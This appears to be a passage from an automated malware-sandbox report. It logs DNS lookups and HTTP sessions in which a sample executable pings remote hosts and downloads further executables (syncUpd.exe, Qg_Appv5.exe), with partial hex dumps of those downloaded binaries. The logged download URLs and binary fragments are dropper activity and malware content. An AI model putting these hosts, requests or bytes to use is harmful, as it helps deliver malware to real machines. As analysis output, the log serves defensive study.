                                                                                                                                                                                                                                            Apr 23, 2024 09:43:20.859918118 CEST1.1.1.1192.168.2.70x56b7No error (0)svc.iolo.com20.157.87.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:23.079001904 CEST1.1.1.1192.168.2.70xeab8No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:23.079001904 CEST1.1.1.1192.168.2.70xeab8No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:27.903155088 CEST1.1.1.1192.168.2.70xb27bNo error (0)download.iolo.netiolo0.b-cdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:27.903155088 CEST1.1.1.1192.168.2.70xb27bNo error (0)iolo0.b-cdn.net169.150.236.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:32.519212008 CEST1.1.1.1192.168.2.70xbd34No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:32.519212008 CEST1.1.1.1192.168.2.70xbd34No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:33.025943995 CEST1.1.1.1192.168.2.70xe88aNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:33.025943995 CEST1.1.1.1192.168.2.70xe88aNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Apr 23, 2024 09:44:03.287524939 CEST1.1.1.1192.168.2.70x601bNo error (0)westus2-2.in.applicationinsights.azure.comwestus2-2.in.ai.monitor.azure.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Apr 23, 2024 09:44:03.287524939 CEST1.1.1.1192.168.2.70x601bNo error (0)westus2-2.in.ai.monitor.azure.comwestus2-2.in.ai.privatelink.monitor.azure.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Apr 23, 2024 09:44:03.287524939 CEST1.1.1.1192.168.2.70x601bNo error (0)westus2-2.in.ai.privatelink.monitor.azure.comgig-ai-prod-westus2-0.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Apr 23, 2024 09:44:10.112539053 CEST1.1.1.1192.168.2.70xe60cNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Apr 23, 2024 09:44:10.112539053 CEST1.1.1.1192.168.2.70xe60cNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            0192.168.2.749699185.172.128.90805496C:\Users\user\Desktop\zLwT7vCojz.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:08.941626072 CEST205OUTGET /cpa/ping.php?substr=five&s=ab&sub=0 HTTP/1.1
                                                                                                                                                                                                                                            Host: 185.172.128.90
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:10.193666935 CEST148INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:09 GMT
                                                                                                                                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                            Content-Length: 1
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Data Raw: 30
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            1192.168.2.749700185.172.128.228805496C:\Users\user\Desktop\zLwT7vCojz.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:10.479135990 CEST191OUTGET /ping.php?substr=five HTTP/1.1
                                                                                                                                                                                                                                            Host: 185.172.128.228
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:10.685028076 CEST147INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:10 GMT
                                                                                                                                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            2192.168.2.749701185.172.128.59805496C:\Users\user\Desktop\zLwT7vCojz.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:10.974117994 CEST181OUTGET /syncUpd.exe HTTP/1.1
                                                                                                                                                                                                                                            Host: 185.172.128.59
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:11.178503990 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:11 GMT
                                                                                                                                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                            Last-Modified: Tue, 23 Apr 2024 07:30:02 GMT
                                                                                                                                                                                                                                            ETag: "52200-616be85ac7fe9"
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Content-Length: 336384
                                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 05 86 02 15 41 e7 6c 46 41 e7 6c 46 41 e7 6c 46 4c b5 b3 46 59 e7 6c 46 4c b5 8c 46 39 e7 6c 46 4c b5 8d 46 6d e7 6c 46 48 9f ff 46 46 e7 6c 46 41 e7 6d 46 2f e7 6c 46 f4 79 89 46 40 e7 6c 46 4c b5 b7 46 40 e7 6c 46 f4 79 b2 46 40 e7 6c 46 52 69 63 68 41 e7 6c 46 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 82 38 12 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 de 00 00 00 66 c3 03 00 00 00 00 45 39 00 00 00 10 00 00 00 f0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 50 c4 03 00 04 00 00 b8 67 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fc 51 01 00 50 00 00 00 00 30 c2 03 d0 1d 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 98 47 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 8c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e3 dd 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 20 6b 00 00 00 f0 00 00 00 6c 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a0 c6 c0 03 00 60 01 00 00 b6 01 00 00 4e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d0 1d 02 00 00 30 c2 03 00 1e 02 00 00 04 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 b4 15 02 04 e8 2f 02 00 00 68 d9 ed
                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$AlFAlFAlFLFYlFLF9lFLFmlFHFFlFAmF/lFyF@lFLF@lFyF@lFRichAlFPEL8efE9@PgQP08G@.text `.rdata kl@@.data`N@.rsrc0@@/h
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:11.178518057 CEST1289INData Raw: 40 00 e8 ff 22 00 00 59 c3 b9 bc 15 02 04 e8 82 02 00 00 68 cf ed 40 00 e8 e9 22 00 00 59 c3 b9 a8 15 02 04 e8 d9 02 00 00 68 c5 ed 40 00 e8 d3 22 00 00 59 c3 6a 00 b9 b0 15 02 04 e8 cf 00 00 00 c3 6a 00 b9 a4 15 02 04 e8 c2 00 00 00 c3 6a 00 b9
                                                                                                                                                                                                                                            Data Ascii: @"Yh@"Yh@"YjjjjUVEP$A^]$AfUVEtV"Y^]UE]UE8u3]P}Y]U}uE]]FU}
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:11.178528070 CEST1289INData Raw: 53 8d 45 a8 50 53 ff 15 8c f0 40 00 53 53 53 53 ff 15 40 f0 40 00 8b 45 f0 8b 0d 98 15 02 04 2b f8 89 7d dc 83 f9 0c 75 07 53 ff 15 84 f0 40 00 8b c7 c1 e0 04 89 45 fc 8b 45 d4 01 45 fc 89 5d ec 8b 45 f8 01 45 ec 8b 45 dc 90 01 45 ec 8b 45 ec 89
                                                                                                                                                                                                                                            Data Ascii: SEPS@SSSS@@E+}uS@EEE]EEEEEEMEEEEMU3E3U*E)EMt]UuE~_^[]V5W=tNu_^UQeEE]UQQhEAT
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:11.178539991 CEST1289INData Raw: 3d 98 15 02 04 00 04 00 00 75 4f 57 57 57 ff 15 4c f0 40 00 57 57 57 57 ff 15 64 f0 40 00 57 ff 15 08 f0 40 00 57 57 57 57 ff 15 74 f0 40 00 57 57 57 57 ff 15 84 f1 40 00 57 e8 c6 15 00 00 57 e8 0b 1b 00 00 57 e8 7c 1b 00 00 57 e8 f3 18 00 00 57
                                                                                                                                                                                                                                            Data Ascii: =uOWWWL@WWWWd@W@WWWWt@WWWW@WWW|WW@8q Fr|Wx@{+F|@WD@W<@X~}5EzuFT||A=u@Nu_3^]U
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:11.178551912 CEST1289INData Raw: 0c 00 76 14 ff 75 0c 8b cf e8 07 ff ff ff 50 53 e8 a9 f1 ff ff 83 c4 0c 6a 00 6a 01 8b cf e8 a3 fc ff ff 8d 45 e8 8b cf 50 57 8d 45 ee 50 e8 02 fd ff ff 8b c8 e8 6c 00 00 00 ff 75 0c 8b cf 89 77 14 e8 e5 fd ff ff 8b 4d f4 5f 5e 64 89 0d 00 00 00
                                                                                                                                                                                                                                            Data Ascii: vuPSjjEPWEPluwM_^d[]Mjj`jj>UuY]U]UM.]UVM/UP'^]3twQYuUVWM
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:11.178563118 CEST1289INData Raw: f3 0f 7e 0e 83 e9 08 8d 76 08 66 0f d6 0f 8d 7f 08 8b 04 8d 78 25 40 00 ff e0 f7 c7 03 00 00 00 75 15 c1 e9 02 83 e2 03 83 f9 08 72 2a f3 a5 ff 24 95 78 25 40 00 90 8b c7 ba 03 00 00 00 83 e9 04 72 0c 83 e0 03 03 c8 ff 24 85 8c 24 40 00 ff 24 8d
                                                                                                                                                                                                                                            Data Ascii: ~vfx%@ur*$x%@r$$@$%@$%@$@$@$@#FGFGr$x%@I#FGr$x%@#r$x%@Io%@\%@T%@L%@D%@<%@
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:11.178580999 CEST1289INData Raw: 00 eb 06 8b 47 04 89 46 04 5f 8b c6 5e 5d c2 04 00 55 8b ec 56 8b f1 c7 06 34 00 41 00 e8 52 00 00 00 f6 45 08 01 74 07 56 e8 e2 09 00 00 59 8b c6 5e 5d c2 04 00 55 8b ec 83 7d 08 00 53 8b d9 74 2d 57 ff 75 08 e8 db 06 00 00 8d 78 01 57 e8 ea 19
                                                                                                                                                                                                                                            Data Ascii: GF_^]UV4AREtVY^]U}St-WuxWCYYtuWPiC_[]V~tveYfF^Au<AWVt$L$|$;v;h%PCs3u%`
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:11.178591967 CEST1289INData Raw: 40 00 8d 49 00 68 2e 40 00 70 2e 40 00 78 2e 40 00 80 2e 40 00 88 2e 40 00 90 2e 40 00 98 2e 40 00 ab 2e 40 00 8b 44 8e 1c 89 44 8f 1c 8b 44 8e 18 89 44 8f 18 8b 44 8e 14 89 44 8f 14 8b 44 8e 10 89 44 8f 10 8b 44 8e 0c 89 44 8f 0c 8b 44 8e 08 89
                                                                                                                                                                                                                                            Data Ascii: @Ih.@p.@x.@.@.@.@.@.@DDDDDDDDDDDDDD$.@.@.@.@.@D$^_FGD$^_IFGFGD$^_FGFGFGD$^_$Wte$fof
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:11.178605080 CEST1289INData Raw: fc ff ff 55 8b ec 6a 0a 6a 00 ff 75 08 e8 6e 21 00 00 83 c4 0c 5d c3 6a 10 68 88 4d 41 00 e8 11 12 00 00 83 cf ff 89 7d e4 33 c0 39 45 08 0f 95 c0 85 c0 75 18 e8 9e 0f 00 00 c7 00 16 00 00 00 e8 24 0f 00 00 8b c7 e8 2d 12 00 00 c3 e8 70 14 00 00
                                                                                                                                                                                                                                            Data Ascii: Ujjun!]jhMA}39Eu$-p @@uYP"Y;ttpCXeA@$u;ttpCXeAB$u PjCYYe PEu1 PVju
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:11.178611040 CEST1289INData Raw: d6 89 45 d8 ff 35 90 26 02 04 ff d6 8b 4d d8 39 4d e4 75 05 39 45 e0 74 ae 89 4d e4 8b d9 89 5d d4 89 45 e0 8b f8 eb 9c 68 e4 f1 40 00 68 d4 f1 40 00 e8 bb fe ff ff 59 59 68 ec f1 40 00 68 e8 f1 40 00 e8 aa fe ff ff 59 59 c7 45 fc fe ff ff ff e8
                                                                                                                                                                                                                                            Data Ascii: E5&M9Mu9EtM]Eh@h@YYh@h@YYE }u)Cj'Yu\}tj'YUjju]Uul/YtugYt]jEE@PMh|LAEE@P}@
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:11.382855892 CEST1289INData Raw: ec 00 74 17 64 8b 1d 00 00 00 00 8b 03 8b 5d c8 89 03 64 89 1d 00 00 00 00 eb 09 8b 45 c8 64 a3 00 00 00 00 8b 45 fc 5b 8b e5 5d c3 55 8b ec 51 51 8b 45 08 53 8b 5d 0c 56 8b 70 0c 8b 48 10 89 4d f8 89 75 fc 57 8b fe 85 db 78 33 8b 55 10 83 fe ff
                                                                                                                                                                                                                                            Data Ascii: td]dEdE[]UQQES]VpHMuWx3Uu)*MUNk9T};T~u}KuyEF0E8E;xw;v)Mk_^[]UQSEEddE]mc[]UQQSVWd5uEd>


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            3192.168.2.749702176.97.76.106805496C:\Users\user\Desktop\zLwT7vCojz.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:12.944147110 CEST186OUTGET /1/Qg_Appv5.exe HTTP/1.1
                                                                                                                                                                                                                                            Host: note.padd.cn.com
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:13.177037954 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:28:17 GMT
                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                            Content-Length: 8538160
                                                                                                                                                                                                                                            Last-Modified: Mon, 22 Apr 2024 21:57:43 GMT
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            ETag: "6626dd57-824830"
                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 41 fc f8 63 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 cc 0d 00 00 28 74 00 00 00 00 00 e8 e4 0d 00 00 10 00 00 00 f0 0d 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 c0 82 00 00 04 00 00 29 e5 82 00 02 00 40 01 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 80 0e 00 28 34 00 00 00 30 10 00 a4 8a 72 00 00 00 00 00 00 00 00 00 00 f8 81 00 30 50 00 00 00 f0 0e 00 78 36 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0e 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b4 89 0e 00 10 08 00 00 00 c0 0e 00 f6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 88 b2 0d 00 00 10 00 00 00 b4 0d 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 54 16 00 00 00 d0 0d 00 00 18 00 00 00 b8 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 2c 27 00 00 00 f0 0d 00 00 28 00 00 00 d0 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 20 53 00 00 00 20 0e 00 00 00 00 00 00 f8 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 28 34 00 00 00 80 0e 00 00 36 00 00 00 f8 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 f6 03 00 00 00 c0 0e 00 00 04 00 00 00 2e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 3c 00 00 00 00 d0 0e 00 00 00 00 00 00 32 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 e0 0e 00 00 02 00 00 00 32 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 36 01 00 00 f0 0e 00 00 38 01 00 00 34 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 a4 8a 72 00 00 30 10 00 00 8c 72 00 00 6c 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 40 15 00 00 00 00 00 00 7a 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                            Data Ascii: MZP@!L!This program must be run under Win32$7PELAc(t@)@@(40r0Px6.text `.itextT `.data,'(@.bss S .idata(46@.didata.@.tls<2.rdata2@@.reloch684@B.rsrcr0rl@@@z@@
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:13.177057981 CEST1289INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 40 00 03 07 42 6f 6f 6c 65 61 6e 01 00 00 00 00 01 00 00 00 00 10 40 00 05 46 61 6c 73 65 04 54 72 75 65 06 53 79 73 74 65 6d 02 00 00 00 34
                                                                                                                                                                                                                                            Data Ascii: @Boolean@FalseTrueSystem4@AnsiCharP@Charh@ShortInt@SmallInt@Integer@Byte@
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:13.177074909 CEST1289INData Raw: 43 00 f4 ff 01 17 40 00 43 00 f4 ff 2c 17 40 00 43 00 f4 ff 55 17 40 00 43 00 f4 ff 81 17 40 00 43 00 f4 ff bd 17 40 00 43 00 f4 ff f8 17 40 00 43 00 f4 ff 33 18 40 00 43 00 f4 ff 79 18 40 00 42 00 f4 ff b3 18 40 00 42 00 f4 ff ed 18 40 00 42 00
                                                                                                                                                                                                                                            Data Ascii: C@C,@CU@C@C@C@C3@Cy@B@B@B3@Cq@C@C@J@J3@Jf@J@J@J#@J\@J@K@J@MTObject&\N@Create@Self$
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:13.177092075 CEST1289INData Raw: 00 04 53 65 6c 66 02 00 08 1c 1c 40 00 01 00 03 4f 62 6a 02 00 02 00 2b 00 50 4f 40 00 0b 47 65 74 48 61 73 68 43 6f 64 65 03 00 9c 10 40 00 08 00 01 08 1c 1c 40 00 00 00 04 53 65 6c 66 02 00 02 00 33 00 50 51 40 00 08 54 6f 53 74 72 69 6e 67 03
                                                                                                                                                                                                                                            Data Ascii: Self@Obj+PO@GetHashCode@@Self3PQ@ToString\@@Self@\@[HQ@SafeCallException@@Self@ExceptObject@ExceptAddr1hQ@AfterConstruction
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:13.177109957 CEST1289INData Raw: 00 00 00 8c 1e 40 00 01 00 00 00 00 02 00 0c 1f 40 00 14 09 50 56 61 72 41 72 72 61 79 20 1f 40 00 02 00 00 00 00 24 1f 40 00 0e 09 54 56 61 72 41 72 72 61 79 18 00 00 00 00 00 00 00 00 06 00 00 00 cc 10 40 00 00 00 00 00 02 08 44 69 6d 43 6f 75
                                                                                                                                                                                                                                            Data Ascii: @@PVarArray @$@TVarArray@DimCount@Flags@ElementSize@LockCount@Data@Bounds@TVarData@VType@Res
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:13.177129984 CEST1289INData Raw: 00 00 00 02 0a 49 64 65 6e 74 69 66 69 65 72 02 00 02 00 00 00 1c 24 40 00 14 10 50 45 78 63 65 70 74 69 6f 6e 52 65 63 6f 72 64 34 24 40 00 02 00 38 24 40 00 0e 10 54 45 78 63 65 70 74 69 6f 6e 52 65 63 6f 72 64 50 00 00 00 00 00 00 00 00 08 00
                                                                                                                                                                                                                                            Data Ascii: Identifier$@PExceptionRecord4$@8$@TExceptionRecordP@ExceptionCode@ExceptionFlags$@ExceptionRecord@ExceptionAddress@NumberParametersExceptionInform
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:13.177165985 CEST1289INData Raw: 20 df 7a 18 df 7a 10 df 7a 08 df 3a c3 8d 40 00 df 28 df 68 08 df 68 10 df 68 18 df 68 20 8b 48 28 89 4a 28 df 7a 20 df 7a 18 df 7a 10 df 7a 08 df 3a c3 90 df 28 df 68 08 df 68 10 df 68 18 df 68 20 df 68 28 8b 48 30 89 4a 30 df 7a 28 df 7a 20 df
                                                                                                                                                                                                                                            Data Ascii: zzz:@(hhhh H(J(z zzz:(hhhh h(H0J0z(z zzz:@(hhhh h(h0H8J8z0z(z zzz:(hhhh h(h0h8H@J@z8z0z(z zzz:@y,l|<x,<DD
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:13.177186966 CEST1289INData Raw: fe 2c 0a 04 00 76 08 8b c7 83 e8 10 89 70 08 8b d3 8b c7 8b ce e8 d5 fb ff ff 8b c7 e8 8e 03 00 00 8b c3 83 c4 20 5d 5f 5e 5b c3 8d 50 03 c1 ea 03 3d 2c 0a 00 00 53 8a 0d 51 20 4e 00 0f 87 48 02 00 00 84 c9 0f b6 82 e0 28 4e 00 8d 1c c5 78 f0 4d
                                                                                                                                                                                                                                            Data Ascii: ,vp ]_^[P=,SQ NH(NxMuVSB9tB#HJPt([SK;CwvBKP[JYK[#t #t #t@=(NujH#_
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:13.177206039 CEST1289INData Raw: 30 0b 00 00 72 c2 e8 f7 f6 ff ff eb bb 90 8b 4e f8 29 ce 01 cb 81 f9 30 0b 00 00 72 b1 89 f0 e8 de f6 ff ff eb a8 81 3d 3c 2a 4e 00 e0 ff 13 00 75 2c 83 ee 10 8b 06 8b 56 04 89 50 04 89 02 c6 05 37 2a 4e 00 00 68 00 80 00 00 6a 00 56 e8 cb f3 ff
                                                                                                                                                                                                                                            Data Ascii: 0rN)0r=<*Nu,VP7*NhjV^[9C<*N8*N7*N1^[[HSVK9r7@9r^[Ot^[
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:13.177222967 CEST1289INData Raw: c1 e8 19 81 e2 ff ff ff 01 09 c1 83 c8 30 88 07 8d 04 92 8d 14 92 83 f9 01 83 df ff c1 e8 18 81 e2 ff ff ff 00 09 c1 83 c8 30 88 07 8d 04 92 8d 14 92 83 f9 01 83 df ff c1 e8 17 81 e2 ff ff 7f 00 09 c1 83 c8 30 88 07 8d 04 92 8d 14 92 83 f9 01 83
                                                                                                                                                                                                                                            Data Ascii: 000?000G_@SVM^[St@[dM4dM[USvh
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:13.409862041 CEST1289INData Raw: e8 3b 0b 00 00 8d 85 dc 07 fe ff 33 c9 ba 00 40 00 00 e8 29 0b 00 00 33 c0 89 85 f8 47 fe ff c6 85 ff 47 fe ff 01 8b 3d 2b 2a 4e 00 e9 82 00 00 00 8b c7 e8 c4 f9 ff ff 8b d8 85 db 74 72 8b c3 83 e8 04 8b 30 f7 c6 01 00 00 00 75 56 f7 c6 04 00 00
                                                                                                                                                                                                                                            Data Ascii: ;3@)3GG=+*Ntr0uVtUYCG}7G5u GGGG.u'*NrJN7u&GsG


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
